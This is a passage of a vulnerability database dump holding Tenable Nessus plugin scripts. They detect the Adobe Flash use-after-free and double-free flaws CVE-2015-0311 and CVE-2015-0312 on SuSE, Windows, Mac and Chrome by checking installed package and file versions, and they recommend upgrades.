script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0311\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 10226)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 11.2.202.440 (bsc#914463,\nAPSA15-01, CVE-2015-0311).\n\nMore information can be found at\nhttps://helpx.adobe.com/security/products/flash-player/apsa15-01.html\n.\n\nAn update of flashplayer (executable binary) for i386 is currently not\navailable and was thus disabled.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=914463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0311.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 10226.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.440-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.440-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.440-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.440-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.440-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.440-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:05:39", "description": "The version of Google Chrome installed on the remote Windows host is\nprior to 40.0.2214.93. It is, therefore, affected by the following\nvulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. (CVE-2015-0312)", "edition": 26, "published": "2015-01-27T00:00:00", "title": "Google Chrome < 40.0.2214.93 Flash Player Multiple Remote Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_40_0_2214_93.NASL", "href": "https://www.tenable.com/plugins/nessus/81020", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81020);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n\n script_name(english:\"Google Chrome < 40.0.2214.93 Flash Player Multiple Remote Code Execution\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple remote code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 40.0.2214.93. It is, therefore, affected by the following\nvulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. (CVE-2015-0312)\");\n # http://googlechromereleases.blogspot.com/2015/01/stable-channel-update_26.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d2bec23e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-03.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 40.0.2214.93 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0312\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'40.0.2214.93', severity:SECURITY_HOLE, xss:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:30:17", "description": "The version of Google Chrome installed on the remote Mac OS X host is\nprior to 40.0.2214.93. It is, therefore, affected by the following\nvulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. (CVE-2015-0312)", "edition": 26, "published": "2015-01-27T00:00:00", "title": "Google Chrome < 40.0.2214.93 Flash Player Multiple Remote Code Execution (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_40_0_2214_93.NASL", "href": "https://www.tenable.com/plugins/nessus/81021", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81021);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n\n script_name(english:\"Google Chrome < 40.0.2214.93 Flash Player Multiple Remote Code Execution (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple remote code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 40.0.2214.93. It is, therefore, affected by the following\nvulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. (CVE-2015-0312)\");\n # http://googlechromereleases.blogspot.com/2015/01/stable-channel-update_26.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d2bec23e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-03.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 40.0.2214.93 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0312\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'40.0.2214.93', severity:SECURITY_HOLE, xss:FALSE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:43:09", "description": "The remote host is missing KB3035034. It is, therefore, affected by\nthe following vulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0312)", "edition": 28, "published": "2015-01-28T00:00:00", "title": "MS KB3035034: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:adobe:flash_player"], "id": "SMB_KB3035034.NASL", "href": "https://www.tenable.com/plugins/nessus/81046", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81046);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n script_xref(name:\"MSKB\", value:\"3035034\");\n\n script_name(english:\"MS KB3035034: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by\nmultiple code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing KB3035034. It is, therefore, affected by\nthe following vulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0312)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/3035034/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-03.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB3035034.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0312\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# < 16.0.0.296\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 16 ||\n (\n iver[0] == 16 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] < 296)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 16.0.0.296' +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:29:47", "description": "According to its version, the Adobe Flash Player installed on the\nremote Mac OS X host is equal or prior to 16.0.0.287. It is,\ntherefore, affected by the following vulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. (CVE-2015-0312)", "edition": 26, "published": "2015-01-26T00:00:00", "title": "Flash Player For Mac <= 16.0.0.287 Unspecified Code Execution (APSA15-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_16_0_0_296.NASL", "href": "https://www.tenable.com/plugins/nessus/80999", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80999);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n\n script_name(english:\"Flash Player For Mac <= 16.0.0.287 Unspecified Code Execution (APSA15-01)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin that is affected by\nmultiple code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Adobe Flash Player installed on the\nremote Mac OS X host is equal or prior to 16.0.0.287. It is,\ntherefore, affected by the following vulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. (CVE-2015-0312)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-03.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/products/flashplayer/distribution3.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 16.0.0.296 or later.\n\nAlternatively, Adobe has made version 13.0.0.264 available for those\ninstallations that cannot be upgraded to 16.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0312\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (ver_compare(ver:version, fix:\"14.0.0.0\", strict:FALSE) >= 0)\n{\n cutoff_version = \"16.0.0.287\";\n fix = \"16.0.0.296\";\n}\nelse\n{\n cutoff_version = \"13.0.0.262\";\n fix = \"13.0.0.264\";\n}\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T02:33:34", "description": "According to its version, the Adobe Flash Player installed on the\nremote Windows host is equal or prior to 16.0.0.287. It is, therefore,\naffected by the following vulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. (CVE-2015-0312)", "edition": 26, "published": "2015-01-26T00:00:00", "title": "Flash Player <= 16.0.0.287 Unspecified Code Execution (APSA15-01 / APSB15-03)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSA15-01.NASL", "href": "https://www.tenable.com/plugins/nessus/80998", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80998);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n\n script_name(english:\"Flash Player <= 16.0.0.287 Unspecified Code Execution (APSA15-01 / APSB15-03)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by\nmultiple code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Adobe Flash Player installed on the\nremote Windows host is equal or prior to 16.0.0.287. It is, therefore,\naffected by the following vulnerabilities :\n\n - A use-after-free error exists that allows an attacker to\n crash the application or execute arbitrary code.\n (CVE-2015-0311)\n\n - A double-free error exists that allows an attacker to\n crash the application or possibly execute arbitrary\n code. (CVE-2015-0312)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-01.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-03.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/products/flashplayer/distribution3.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 16.0.0.296 or later.\n\nAlternatively, Adobe has made version 13.0.0.264 available for those\ninstallations that cannot be upgraded to 16.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0312\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\", \"Chrome_Pepper\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n (\n # Chrome Flash <= 16.0.0.287\n variant == \"Chrome_Pepper\" &&\n (\n (iver[0] < 16) ||\n (iver[0] == 16 && iver[1] == 0 && iver[2] == 0 && iver[3] <= 287)\n )\n ) ||\n (variant != \"Chrome_Pepper\" &&\n (\n (\n # < 13\n (\n iver[0] < 13 ||\n # 13.0.0.x <= 13.0.0.262\n (\n iver[0] == 13 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 262\n )\n )\n )\n )\n ) ||\n # 14.0.0.x <= 16.0.0.287\n (\n iver[0] == 14 ||\n (\n iver[0] == 15 ||\n (\n iver[0] == 16 &&\n (\n iver[1] == 0 &&\n (\n iver[2] == 0 &&\n (\n iver[3] <= 287\n )\n )\n )\n )\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"16.0.0.296 / 13.0.0.264\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = 